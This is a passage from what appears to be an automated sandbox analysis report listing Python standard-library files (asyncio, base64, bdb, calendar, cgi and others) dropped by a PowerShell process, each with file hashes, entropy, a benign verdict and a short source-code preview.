                                                                                                    Category:dropped
                                                                                                    Size (bytes):11057
                                                                                                    Entropy (8bit):4.483143343037431
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:9OHQeRHshZCLgUWipf9ImE13ACrCN7ZMNUDlM1kw0dgmw/vuKwAHdtEZF/S19VdK:936TgUfSTUS0dKHqF/SD/3r9ZG
                                                                                                    MD5:786D77690A797492513E944D3B0A3738
                                                                                                    SHA1:558FA6A0BF0B155036F2664CEBB3A61ABB0F833F
                                                                                                    SHA-256:9C1DAEFB52B4EDD948ACB7F6B202EB3E7D72DCB0706CC035076C9F6A13AC529B
                                                                                                    SHA-512:20A6B43D4F39DA10D9ED9B717834CF62C8015DA52C64DB287C37F8BB209EED652E7BB159917A304695E51535F3419FA0DF362B8E2D1AF6C878C7938D87646516
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Abstract Transport class."""....__all__ = (.. 'BaseTransport', 'ReadTransport', 'WriteTransport',.. 'Transport', 'DatagramTransport', 'SubprocessTransport',..)......class BaseTransport:.. """Base class for transports.""".... __slots__ = ('_extra',).... def __init__(self, extra=None):.. if extra is None:.. extra = {}.. self._extra = extra.... def get_extra_info(self, name, default=None):.. """Get optional transport information.""".. return self._extra.get(name, default).... def is_closing(self):.. """Return True if the transport is closing or closed.""".. raise NotImplementedError.... def close(self):.. """Close the transport..... Buffered data will be flushed asynchronously. No more data.. will be received. After all buffered data is flushed, the.. protocol's connection_lost() method will (eventually) be.. called with None as its argument... """.. raise Not
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2573
                                                                                                    Entropy (8bit):4.380578135626314
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:+oSYj9/IgdHlz6M6duFruaHo+89gcR8fxaMU:15/Igxl+AyqoR8Y
                                                                                                    MD5:98440E7E64C21EFB53A1F1A1EF96DD09
                                                                                                    SHA1:9885A51DFE12C79E994310501D8142687967FC5A
                                                                                                    SHA-256:CE72DE2AFC811493E169B486E60E510FDB99F9170E01F06A9A8EC720D7E75038
                                                                                                    SHA-512:BE69E207A9F50CB66F42180E4207A34469D14F6D8951FF7BA73B272B0EF9CE95F1BBB0D277D8B1ACB9E70B069B2BC5C724A0BD46324FC1AFC1B9AF18F2FE03F4
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:import socket......class TransportSocket:.... """A socket-like wrapper for exposing real transport sockets..... These objects can be safely returned by APIs like.. `transport.get_extra_info('socket')`. All potentially disruptive.. operations (like "socket.close()") are banned... """.... __slots__ = ('_sock',).... def __init__(self, sock: socket.socket):.. self._sock = sock.... @property.. def family(self):.. return self._sock.family.... @property.. def type(self):.. return self._sock.type.... @property.. def proto(self):.. return self._sock.proto.... def __repr__(self):.. s = (.. f"<asyncio.TransportSocket fd={self.fileno()}, ".. f"family={self.family!s}, type={self.type!s}, ".. f"proto={self.proto}".. ).... if self.fileno() != -1:.. try:.. laddr = self.getsockname().. if laddr:.. s = f"{s}, laddr={laddr
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):54624
                                                                                                    Entropy (8bit):4.32194179582691
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:vSYjWziU+bQBl5Xby0sIztcA8Z3gYhTUqW0KCcWe8S1J1No4by:vSYjVAq/cW41U
                                                                                                    MD5:979E8018D3242BDB10D75D5E4AEA538E
                                                                                                    SHA1:96C1D1757D764E94651BC1E1233C63E920D549AD
                                                                                                    SHA-256:7DF3B5336C8DF24963EAAEE142F0E5CA25ADC3F7173CA3B4DC91BD2C5817D8AD
                                                                                                    SHA-512:BDCAFDF05449D60E47D78ECA23434532C933A8A6034814BC00D3D8F7E3C62947349F47345F87CF6A2FFDB72E72FF5D38E3252B2BFCFDB5572D1683EF70AEE551
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Selector event loop for Unix with signal handling."""....import errno..import io..import itertools..import os..import selectors..import signal..import socket..import stat..import subprocess..import sys..import threading..import warnings....from . import base_events..from . import base_subprocess..from . import constants..from . import coroutines..from . import events..from . import exceptions..from . import futures..from . import selector_events..from . import tasks..from . import transports..from .log import logger......__all__ = (.. 'SelectorEventLoop',.. 'AbstractChildWatcher', 'SafeChildWatcher',.. 'FastChildWatcher', 'PidfdChildWatcher',.. 'MultiLoopChildWatcher', 'ThreadedChildWatcher',.. 'DefaultEventLoopPolicy',..)......if sys.platform == 'win32': # pragma: no cover.. raise ImportError('Signals are not really supported on Windows')......def _sighandler_noop(signum, frame):.. """Dummy signal handler.""".. pass......def waitstatus_to_exitcode(status):.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33488
                                                                                                    Entropy (8bit):4.416832197041315
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:YSFlSE8iWvPeLAZqzDr1LZPJKxaKSCsiWsgTZ:YSFlwyzDrDPJyaKIiWsS
                                                                                                    MD5:D7001F859BE7BFEE335A062CB6779E73
                                                                                                    SHA1:41543F6D399B0F7E260D352A376D7FA1EB1C989A
                                                                                                    SHA-256:0F94ACDFD79706099961BB265A0E6431E744234CAC3F572209A1653A5321FDA7
                                                                                                    SHA-512:E163E9ACBD1F14E72F18101E53CF5B69420D9EBC3583C16C72CB3677A790FD02A3540C06F347CDB05A06BF7C49512278207B28EBEC5F7935015E0C9EB313F010
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Selector and proactor event loops for Windows."""....import sys....if sys.platform != 'win32': # pragma: no cover.. raise ImportError('win32 only')....import _overlapped..import _winapi..import errno..from functools import partial..import math..import msvcrt..import socket..import struct..import time..import weakref....from . import events..from . import base_subprocess..from . import futures..from . import exceptions..from . import proactor_events..from . import selector_events..from . import tasks..from . import windows_utils..from .log import logger......__all__ = (.. 'SelectorEventLoop', 'ProactorEventLoop', 'IocpProactor',.. 'DefaultEventLoopPolicy', 'WindowsSelectorEventLoopPolicy',.. 'WindowsProactorEventLoopPolicy',..)......NULL = _winapi.NULL..INFINITE = _winapi.INFINITE..ERROR_CONNECTION_REFUSED = 1225..ERROR_CONNECTION_ABORTED = 1236....# Initial delay in seconds for connect_pipe() before retrying to connect..CONNECT_PIPE_INIT_DELAY = 0.001....# Maximum delay
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5233
                                                                                                    Entropy (8bit):4.66851270735605
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:boTZtyajYlxYEsofyCFdVhXpdGepIpLbpxYaVXwW/W6CGIa8HR5Kw7ygKwabPKwP:boF8aElNfyUpHbO5LQWQ3H6w7yBwASwP
                                                                                                    MD5:3D2450646C295F667F04535CB6511EE9
                                                                                                    SHA1:25FF829B27063DA4032110F82531A3657DDEA61A
                                                                                                    SHA-256:23FF6C7FECECFE35A06EAF7615C1E1E67C0740B78CA75A04C548B184BE87B958
                                                                                                    SHA-512:76763286932FA7B2105DEC85F82A34B14A55FC747BDEED12DCC78F5D779CCBB4BC05D81E13316E3C65C6E34772B8995A2D66AC0DE59B8F29F51E54DEE4734457
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Various Windows specific bits and pieces."""....import sys....if sys.platform != 'win32': # pragma: no cover.. raise ImportError('win32 only')....import _winapi..import itertools..import msvcrt..import os..import subprocess..import tempfile..import warnings......__all__ = 'pipe', 'Popen', 'PIPE', 'PipeHandle'......# Constants/globals......BUFSIZE = 8192..PIPE = subprocess.PIPE..STDOUT = subprocess.STDOUT.._mmap_counter = itertools.count()......# Replacement for os.pipe() using handles instead of fds......def pipe(*, duplex=False, overlapped=(True, True), bufsize=BUFSIZE):.. """Like os.pipe() but with overlapped support and using handles not fds.""".. address = tempfile.mktemp(.. prefix=r'\\.\pipe\python-pipe-{:d}-{:d}-'.format(.. os.getpid(), next(_mmap_counter))).... if duplex:.. openmode = _winapi.PIPE_ACCESS_DUPLEX.. access = _winapi.GENERIC_READ | _winapi.GENERIC_WRITE.. obsize, ibsize = bufsize, bufsize.. else:.. ope
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21189
                                                                                                    Entropy (8bit):4.826320961193315
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:j+uTw4InidNdYsBM+3O8dvd936r34MJIBf5V1u:9xIANdNBM+3O8dvd936kfB57u
                                                                                                    MD5:231AE490D92466B1573E541649772154
                                                                                                    SHA1:4E47769F5A3239F17AF2CE1D9A93C411C195A932
                                                                                                    SHA-256:9E685425290C771DF1A277B5C7787AD5D4CF0312F2C4B042CE44756DF6A3D112
                                                                                                    SHA-512:7084B49F0788BFBE035BC2FE42DB7A63B21EBC99F63C03F80DEC5569067C1E63312D8C5A754F2D72D7C9BB51FA23CA479FCBA78682610EB2B68870CBEAE1BEA3
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:#! /usr/bin/env python3...."""Base16, Base32, Base64 (RFC 3548), Base85 and Ascii85 data encodings"""....# Modified 04-Oct-1995 by Jack Jansen to use binascii module..# Modified 30-Dec-2003 by Barry Warsaw to add full RFC 3548 support..# Modified 22-May-2007 by Guido van Rossum to use bytes everywhere....import re..import struct..import binascii......__all__ = [.. # Legacy interface exports traditional RFC 2045 Base64 encodings.. 'encode', 'decode', 'encodebytes', 'decodebytes',.. # Generalized interface for other encodings.. 'b64encode', 'b64decode', 'b32encode', 'b32decode',.. 'b32hexencode', 'b32hexdecode', 'b16encode', 'b16decode',.. # Base85 and Ascii85 encodings.. 'b85encode', 'b85decode', 'a85encode', 'a85decode',.. # Standard Base64 encoding.. 'standard_b64encode', 'standard_b64decode',.. # Some common Base64 alternatives. As referenced by RFC 3458, see thread.. # starting at:.. #.. # http://zgp.org/pipermail/p2p-hackers/2001-September/00
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33356
                                                                                                    Entropy (8bit):4.376082539550425
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:jv2yeGid9OJ5zweRTWR8mQL+7bN3Lczaa7iXBW8widsF/isFuJQMFIqZ4F9bFxS:jvYVd9OH7s81+7xczaaeXklwBqqZoS
                                                                                                    MD5:01EF6CDE1AA70849AA0075A172DF530B
                                                                                                    SHA1:74EE7F1D19C9B91671B77D0B757B7C0B03FDF069
                                                                                                    SHA-256:6FF624D945871D29763B60FD1B4B15A30B2D161853B42D7B0F13BFACB825194C
                                                                                                    SHA-512:148C1AAB60E367942AAD47AD1F0C2C346A401FB6AA65BB67B17A82D9C8D260584C53C7326BFB0D76209B7C47B446E011388BE344E115CDFA4C86AE555F2B1F83
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Debugger basics"""....import fnmatch..import sys..import os..from inspect import CO_GENERATOR, CO_COROUTINE, CO_ASYNC_GENERATOR....__all__ = ["BdbQuit", "Bdb", "Breakpoint"]....GENERATOR_AND_COROUTINE_FLAGS = CO_GENERATOR | CO_COROUTINE | CO_ASYNC_GENERATOR......class BdbQuit(Exception):.. """Exception to give up completely."""......class Bdb:.. """Generic Python debugger base class..... This class takes care of details of the trace facility;.. a derived class should implement user interaction... The standard debugger class (pdb.Pdb) is an example..... The optional skip argument must be an iterable of glob-style.. module name patterns. The debugger will not step into frames.. that originate in a module that matches one of these patterns... Whether a frame is considered to originate in a certain module.. is determined by the __name__ in the frame globals... """.... def __init__(self, skip=None):.. self.skip = set(skip) if skip else None..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3541
                                                                                                    Entropy (8bit):4.348806691148274
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:zPKqBnBS/M2bld2S/qu47KHBntS/bEmXNYldcS/osuz:rnBBSE2bySCu47MBtSDEmXNYwSAtz
                                                                                                    MD5:3AC90488AE7B8D9BD94AF42E5B341EE8
                                                                                                    SHA1:1A061493EAB0B6A5BFBE0A145CB320A28984AE89
                                                                                                    SHA-256:085DAD54DD1A00D68AAA5361031C0C4BFF5EFBD281D1A02DDC8F317C519E540B
                                                                                                    SHA-512:BD3C8CE218D70C146D06D722D096816FE975F4C85C4BBF75F2EFC928F7DE7B97849B1FC632A9EE2A81F92F60F7E9712141AF5A273EB49F9125336422BCB193E4
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Bisection algorithms."""......def insort_right(a, x, lo=0, hi=None, *, key=None):.. """Insert item x in list a, and keep it sorted assuming a is sorted..... If x is already in a, insert it to the right of the rightmost x..... Optional args lo (default 0) and hi (default len(a)) bound the.. slice of a to be searched..... A custom key function can be supplied to customize the sort order... """.. if key is None:.. lo = bisect_right(a, x, lo, hi).. else:.. lo = bisect_right(a, key(x), lo, hi, key=key).. a.insert(lo, x)......def bisect_right(a, x, lo=0, hi=None, *, key=None):.. """Return the index where to insert item x in list a, assuming a is sorted..... The return value i is such that all e in a[:i] have e <= x, and all e in.. a[i:] have e > x. So if x already appears in the list, a.insert(i, x) will.. insert just after the rightmost x already there..... Optional args lo (default 0) and hi (default len(a)) bound the.. slice o
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12191
                                                                                                    Entropy (8bit):4.488567907611872
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:wzhNfE8LZDY+YEzU3/OF/q+FjqqxbWXVvScmwWa0r1LAd1ichQiilHfP6Qhc9O1O:KLrXX/q+FjZWq2Wan3oxc8NE0Bx4
                                                                                                    MD5:C7F6B929829D1196DFC6C59BFA8BE4D5
                                                                                                    SHA1:2B0A3AF1F680F8D70E05A25AA8552A47E5109F7D
                                                                                                    SHA-256:A539FC503737C53D5A45272E33A435B8A6B7A8559BA6A425002978038096BD66
                                                                                                    SHA-512:63BFA9AD43141C609436B928F7DEBB5477188F1E7B30EBD6D9CC5080DB6D10FBF4E94C25BEC3E2C7DC8677D7BCD537B93550324A08B5376FD9E35184A8517E3B
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Interface to the libbzip2 compression library.....This module provides a file interface, classes for incremental..(de)compression, and functions for one-shot (de)compression..."""....__all__ = ["BZ2File", "BZ2Compressor", "BZ2Decompressor",.. "open", "compress", "decompress"]....__author__ = "Nadeem Vawda <nadeem.vawda@gmail.com>"....from builtins import open as _builtin_open..import io..import os..import _compression....from _bz2 import BZ2Compressor, BZ2Decompressor......_MODE_CLOSED = 0.._MODE_READ = 1..# Value 2 no longer used.._MODE_WRITE = 3......class BZ2File(_compression.BaseStream):.... """A file object providing transparent bzip2 (de)compression..... A BZ2File can act as a wrapper for an existing file object, or refer.. directly to a named file on disk..... Note that BZ2File provides a *binary* file interface - data read is.. returned as bytes, and data to be written should be given as bytes... """.... def __init__(self, filename, mo
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6751
                                                                                                    Entropy (8bit):4.372089344710114
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:GzRbR7raBofIUXCM/nRwcIxjZzx2kl7ThaiDwj0:GN1CeIKZMZzx2I7NJ
                                                                                                    MD5:7A452B99ABF85FE515C607185633F7C7
                                                                                                    SHA1:37E4A0B74315CD605BA834036E68EBD5218B9267
                                                                                                    SHA-256:8CD9BC9E6ED6CF5B24EC0259B242CE0F3B90DBBF707AD775E146347E5308A3AC
                                                                                                    SHA-512:744DC2E1978C57E8AFF571CC17194F09559883E3F46D84CCFB128583EB9EC4888FD51553527AB4F714D03C779B8968C16984E6A5B60833E3A37972969BE36624
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:#! /usr/bin/env python3...."""Python interface for the 'lsprof' profiler... Compatible with the 'profile' module..."""....__all__ = ["run", "runctx", "Profile"]....import _lsprof..import importlib.machinery..import io..import profile as _pyprofile....# ____________________________________________________________..# Simple interface....def run(statement, filename=None, sort=-1):.. return _pyprofile._Utils(Profile).run(statement, filename, sort)....def runctx(statement, globals, locals, filename=None, sort=-1):.. return _pyprofile._Utils(Profile).runctx(statement, globals, locals,.. filename, sort)....run.__doc__ = _pyprofile.run.__doc__..runctx.__doc__ = _pyprofile.runctx.__doc__....# ____________________________________________________________....class Profile(_lsprof.Profiler):.. """Profile(timer=None, timeunit=None, subcalls=True, builtins=True).... Builds a profiler object using the specified timer function... The default
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26216
                                                                                                    Entropy (8bit):4.668179135447798
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:TvzXruAqTnK7ZC77ZMVw6dPRSEFsW8ehzEOPp7OKkmL3:TrX6AqTnK7WSW67SE+W8euOPp7gc
                                                                                                    MD5:15BFD34DD4F3E752EE250C95B7627E84
                                                                                                    SHA1:A853D016A1F6F2EA79EE69E652FFDCE5A88BF6F4
                                                                                                    SHA-256:F1488547B4A1783E310461C21552E6B75D0D55C89D46BE6AEF23F82008474D60
                                                                                                    SHA-512:5A0ACE7F77249124A4F0F389CD7B7674325A94B9AA3003BD277931F3A5DC618B6CA4CBD5C4B85BD809AE248F012EBA4EDBDD76C73B8D6AB277A641E35072044B
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Calendar printing functions....Note when comparing these calendars to the ones printed by cal(1): By..default, these calendars have Monday as the first day of the week, and..Sunday as the last (the European convention). Use setfirstweekday() to..set the first day of the week (0=Monday, 6=Sunday)."""....import sys..import datetime..from enum import IntEnum, global_enum..import locale as _locale..from itertools import repeat..import warnings....__all__ = ["IllegalMonthError", "IllegalWeekdayError", "setfirstweekday",.. "firstweekday", "isleap", "leapdays", "weekday", "monthrange",.. "monthcalendar", "prmonth", "month", "prcal", "calendar",.. "timegm", "month_name", "month_abbr", "day_name", "day_abbr",.. "Calendar", "TextCalendar", "HTMLCalendar", "LocaleTextCalendar",.. "LocaleHTMLCalendar", "weekheader",.. "Day", "Month", "JANUARY", "FEBRUARY", "MARCH",.. "APRIL", "MAY", "JUNE", "JULY",.. "AUGUST", "SEPT
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35432
                                                                                                    Entropy (8bit):4.5655412978209835
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:V2v4jDz46jcJeYMs0s1mZrgmTJFg9kAQNM0KJkY:Vu4A6jcV0swZrgIJFg9kAQNM0KJkY
                                                                                                    MD5:71CF25331B3B8E9A3FDFF28A13CA0DA9
                                                                                                    SHA1:7926E88D4E54A8C3CFF2473427D3CC583F08595D
                                                                                                    SHA-256:CC73FBC2865D5E88F1E04D23F5E0B0A4AD46EA7410C86B39A43B8EAA0384DACA
                                                                                                    SHA-512:2C16D08610A77521619116D20CABF3033A2098936EAECF6E043DD00C62C44B4A3DE7BC99F3BC2E1867F788F691D4C4D72EF7F5DED70A8E66D98D9B3B1AD846CD
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:#! /usr/local/bin/python....# NOTE: the above "/usr/local/bin/python" is NOT a mistake. It is..# intentionally NOT "/usr/bin/env python". On many systems..# (e.g. Solaris), /usr/local/bin is not in $PATH as passed to CGI..# scripts, and /usr/local/bin is the default directory where Python is..# installed, so /usr/bin/env would be unable to find python. Granted,..# binary installations by Linux vendors often install Python in..# /usr/bin. So let those vendors patch cgi.py to match their choice..# of installation....."""Support module for CGI (Common Gateway Interface) scripts.....This module defines a number of utilities for use by CGI scripts..written in Python.....The global variable maxlen can be set to an integer indicating the maximum size..of a POST request. POST requests larger than this size will result in a..ValueError being raised during parsing. The default value of this variable is 0,..meaning the request size is unlimited..."""....# History..# -------..#..# Michael McLa
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12753
                                                                                                    Entropy (8bit):4.632770457016971
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:J3xSBs8vXrberb4e2VcxsfBP9DG5mGFWMh+bVuJyGaUOsK/2J4hXTirLu/y6aUMh:Cs8frqrtxZPhFy/UOt+JeyDUMkJo/tXR
                                                                                                    MD5:354C0C2AD94D77FB953D527A97312B3E
                                                                                                    SHA1:EA665B087D00B34E67ADE3FC183F204476E40C54
                                                                                                    SHA-256:A61B06E42D738FCA9FC1839441B54B21BB5C39C315A7FAD67E0C44D74154ECFE
                                                                                                    SHA-512:675DF0D81B34389C448AC3BBB87B711EC2E62CD60936C0E8E34CB9D6FAA562AC2276BF518692778901488511D068251AC718916AFB62658D8181FEA12AC22976
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""More comprehensive traceback formatting for Python scripts.....To enable this module, do:.... import cgitb; cgitb.enable()....at the top of your script. The optional arguments to enable() are:.... display - if true, tracebacks are displayed in the web browser.. logdir - if set, tracebacks are written to files in this directory.. context - number of lines of source code to show for each stack frame.. format - 'text' or 'html' controls the output format....By default, tracebacks are displayed but not saved, the context is 5 lines..and the output format is 'html' (for backwards compatibility with the..original use of this module)....Alternatively, if you have caught an exception and want cgitb to display it..for you, call cgitb.handler(). The optional argument to handler() is a..3-item tuple (etype, evalue, etb) just like the value of sys.exc_info()...The default handler displays output as HTML....."""..import inspect..import keyword..import linecache
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5673
                                                                                                    Entropy (8bit):4.3907004428499565
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Or09dhcWG/Fu2EC6Gx6h8zsGx/SAojX6wu/YBsrgS:OV40Ohqs06Dul1v
                                                                                                    MD5:3A8DBD502B1B1AF5C9F241ECFF1BAF93
                                                                                                    SHA1:AD663612D098B07FD64FE8409CDF0AFEFD0B1321
                                                                                                    SHA-256:78554D5FD093A64D0F63C4930E206203412B17318282E3D0C1A10BADB7C28CBD
                                                                                                    SHA-512:A94F5E4EC608392E4511C26FFC8B58AD88490B72678F9D98A1F673DAFE0D8A7970BB4CD676EEE1B98611116643D3BF86D8B77CB45C8819DD3F17A53D3F0A5462
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Simple class to read IFF chunks.....An IFF chunk (used in formats such as AIFF, TIFF, RMFF (RealMedia File..Format)) has the following structure:....+----------------+..| ID (4 bytes) |..+----------------+..| size (4 bytes) |..+----------------+..| data |..| ... |..+----------------+....The ID is a 4-byte string which identifies the type of chunk.....The size field (a 32-bit value, encoded using big-endian byte order)..gives the size of the whole chunk, including the 8-byte header.....Usually an IFF-type file consists of one or more chunks. The proposed..usage of the Chunk class defined here is to instantiate an instance at..the start of each chunk and read from the instance until it reaches..the end, after which a new instance can be instantiated. At the end..of the file, creating a new instance will fail with an EOFError..exception.....Usage:..while True:.. try:.. chunk = Chunk(file).. except EOFError:.. break.. chunktype = chunk.get
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15274
                                                                                                    Entropy (8bit):4.213305027609708
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:PL0k/Lx0tTb7zgerjv/DrjydCD1azzAr3hBaUcWkfcoBOvtBA5FMk:PL07tTbnge/zrjOcuAr3hTctfhj
                                                                                                    MD5:B2E826868B72DF359289D0CF2D27D9E9
                                                                                                    SHA1:F29D5964C3E83013C6A8FE8C2B1E56A9E6FAF9C1
                                                                                                    SHA-256:165B7F2ED818AFC700DDAAF8D8FB2918E4A1E585A5965F0172D96DF6F1FD9962
                                                                                                    SHA-512:AA1A649A1FCBB123657BCCD0F33FDFE2FBDA027D6B4312B73083A7689D4C3A05F96C9C2C4CDFED43746B3307A0CF17A338BCB203FF2CF4D425EAE9E689FEBD14
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""A generic class to build line-oriented command interpreters.....Interpreters constructed with this class obey the following conventions:....1. End of file on input is processed as the command 'EOF'...2. A command is parsed out of each line by collecting the prefix composed.. of characters in the identchars member...3. A command `foo' is dispatched to a method 'do_foo()'; the do_ method.. is passed a single argument consisting of the remainder of the line...4. Typing an empty line repeats the last command. (Actually, it calls the.. method `emptyline', which may be overridden in a subclass.)..5. There is a predefined `help' method. Given an argument `topic', it.. calls the command `help_topic'. With no arguments, it lists all topics.. with defined help_ functions, broken into up to three topics; documented.. commands, miscellaneous help topics, and undocumented commands...6. The command '?' is a synonym for `help'. The command '!' is a synonym.. for `shell', if a do_
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11012
                                                                                                    Entropy (8bit):4.359905084854054
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:BXaaxojmnEGaG2vGKDOwyTe4J54iLxqeKon:BXaanOt8eoCMbKo
                                                                                                    MD5:1840A8815D3D702DB9968063C681C503
                                                                                                    SHA1:CC206EB72520580604032955A95127B735A4BB9B
                                                                                                    SHA-256:044F67D22DB4DC4A3B5F4353FE6FA83DD3B02A2288EC672411DCD9676713748D
                                                                                                    SHA-512:EDE3567AC602D19A4ECDFD1CC3F8BFADBC524ECEE0C7355C66143FD211893122B95D399827E10D3A7EC62497B593AA6A03D3C33839197BEE6111A07480835B99
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Utilities needed to emulate Python's interactive interpreter....."""....# Inspired by similar code by Jeff Epler and Fredrik Lundh.......import sys..import traceback..from codeop import CommandCompiler, compile_command....__all__ = ["InteractiveInterpreter", "InteractiveConsole", "interact",.. "compile_command"]....class InteractiveInterpreter:.. """Base class for InteractiveConsole..... This class deals with parsing and interpreter state (the user's.. namespace); it doesn't deal with input buffering or prompting or.. input file naming (the filename is always passed in explicitly)..... """.... def __init__(self, locals=None):.. """Constructor..... The optional 'locals' argument specifies the dictionary in.. which code will be executed; it defaults to a newly created.. dictionary with key "__name__" set to "__console__" and key.. "__doc__" set to None..... """.. if locals is None:.. locals = {"__n
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):37999
                                                                                                    Entropy (8bit):4.4059544047995285
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:JsOEZ+8dxiEjo5g4cyjh8Rx+foH20+MEtiyAmpqiWjo:JXfm+MEtiyAmpqiWjo
                                                                                                    MD5:02D15642CA5C5F2FA6DAB2032BF3BAC1
                                                                                                    SHA1:6A57BAAC2F284CAD413ABFCDCF4B06CBAB496BA7
                                                                                                    SHA-256:000CF1D683C677ED3DE6D8E284376F81DEF4B91F93D68EE41BDF07C4E04CEA77
                                                                                                    SHA-512:23A251CF3CF0C73F22741B50D98C6B4C3156F934780A37E72C69325A9796534BC3D67849704D53D83BF8FB5DE747FB3BFAD59FC5CA7F8C074A5C4C2574C19329
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
